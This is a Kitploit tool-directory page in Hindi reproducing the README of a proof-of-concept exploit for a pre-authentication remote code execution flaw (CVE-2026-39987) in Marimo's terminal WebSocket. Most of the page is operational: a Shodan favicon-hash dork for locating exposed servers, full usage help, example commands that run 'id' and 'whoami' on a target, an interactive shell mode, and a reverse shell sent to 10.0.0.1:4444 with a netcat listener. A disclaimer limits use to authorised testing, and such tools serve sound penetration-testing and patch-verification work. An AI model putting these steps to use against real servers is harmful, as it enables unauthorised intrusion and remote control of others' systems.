Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 शोषण उपकरण - Marimo < 0.23.0 Pre-Auth RCE (WebSocket) | Kitploit
उपकरण/GitHubGitHub/m3ph1569/cve-2026-39987-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 शोषण उपकरण - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

रिपॉजिटरी देखें
211 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39987 - Marimo < 0.23.0 प्री-प्रमाणीकरण RCE (वेबसॉकेट)

CVSS Severity Python License

Marimo के 0.23.0 से पहले के संस्करणों में एक गंभीर प्री-प्रमाणीकरण रिमोट कोड निष्पादन (RCE) कमजोरी के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट।

यह कमजोरी एक अप्रमाणित हमलावर को वेबसॉकेट एंडपॉइंट (/terminal/ws) से जुड़ने और लक्ष्य सर्वर पर मनमानी सिस्टम कमांड निष्पादित करने की अनुमति देती है।

विशेषताएँ

  • स्वचालित सत्यापन: स्वचालित रूप से लक्ष्य में कमजोरी की जाँच करता है, संस्करण की पहचान करके और Marimo एप्लिकेशन की उपस्थिति (फ़ेविकॉन और /api/version एंडपॉइंट के माध्यम से) सत्यापित करता है।
  • एकल कमांड निष्पादन: लक्ष्य पर एक एकल कमांड भेजें और आउटपुट प्राप्त करें।
  • इंटरैक्टिव शेल: लक्ष्य के साथ सहज बातचीत के लिए एक छद्म-इंटरैक्टिव स्थायी शेल बनाएँ।
  • : रिवर्स शेल पेलोड उत्पन्न करने और निष्पादित करने के लिए अंतर्निहित समर्थन।
रिवर्स शेल जनरेशन
  • सत्यापन बायपास: उन वातावरणों के लिए --no-check फ्लैग के साथ संस्करण और उपस्थिति जाँच को बायपास करने की क्षमता जहाँ एंडपॉइंट छिपे हो सकते हैं।
  • Shodan / FOFA डॉर्क

    संभावित रूप से कमजोर उदाहरणों की पहचान करने के लिए आप निम्न डॉर्क का उपयोग कर सकते हैं:

    root@kitploit:~
    http.favicon.hash:-1864630356
    

    स्थापना

    निर्भरताएँ स्थापित करने के लिए Python आभासी वातावरण का उपयोग करने की अनुशंसा की जाती है।

    root@kitploit:~
    # 1. Clone the repository
    git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
    cd CVE-2026-39987-POC
    
    # 2. Create and activate a virtual environment
    python -m venv .CVE-2026-39987
    
    # Windows
    .CVE-2026-39987\Scripts\activate
    # Linux/macOS
    source .CVE-2026-39987/bin/activate
    
    # 3. Upgrade pip and Install required dependencies
    # Windows
    py pip install --upgrade pip ; pip install -r requirements.txt
    # Linux/MacOS
    python3 pip install --upgrade pip && pip install -r requirements.txt
    

    उपयोग

    root@kitploit:~
    usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]
    
    positional arguments:
      target               Target URL (e.g. http://localhost:8080)
      command              Command to execute (omit when using -i)
    
    options:
      -h, --help           show this help message and exit
      --no-check           Skip vulnerability version check
    
    Execution modes:
      -i, --interactive    Interactive shell mode
      --revshell IP PORT   Generate & send a bash reverse shell payload
    
    WebSocket tuning:
      --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
      --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
      --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)
    
    Reconnect options:
      --max-retries N      Max auto-reconnect attempts (default: 5)
      --no-reconnect       Disable auto-reconnect on unexpected disconnect
    

    उदाहरण

    1. एकल कमांड चलाएँ:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "id"
    

    2. इंटरैक्टिव शेल शुरू करें:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 -i
    

    3. रिवर्स शेल निष्पादित करें: सुनिश्चित करें कि आपकी मशीन पर netcat लिसनर चल रहा है (जैसे, nc -lvnp 4444)।

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444
    

    4. सत्यापन जाँच छोड़ें और बलपूर्वक निष्पादन करें:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check
    

    योगदान

    योगदान का स्वागत है! कृपया बेझिझक एक पुल रिक्वेस्ट जमा करें।

    1. रिपॉजिटरी को फोर्क करें
    2. अपनी फीचर ब्रांच बनाएँ (git checkout -b feature/update-feature)
    3. अपने बदलावों को कमिट करें (git commit -m 'Add update feature')
    4. ब्रांच पर पुश करें (git push origin feature/update-feature)
    5. पुल रिक्वेस्ट खोलें

    अस्वीकरण

    यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत नैतिक हैकिंग के लिए है। लेखक इस स्क्रिप्ट के कारण होने वाले किसी भी दुरुपयोग, क्षति या अवैध गतिविधियों के लिए जिम्मेदार नहीं है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास सिस्टम स्वामी से स्पष्ट अनुमति है। इस स्क्रिप्ट का अनधिकृत उपयोग अवैध है और कानून द्वारा दंडनीय है।

    लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


    ☕︎ के साथ बनाया गया M3PH1569 द्वारा
    टूल डाउनलोड करें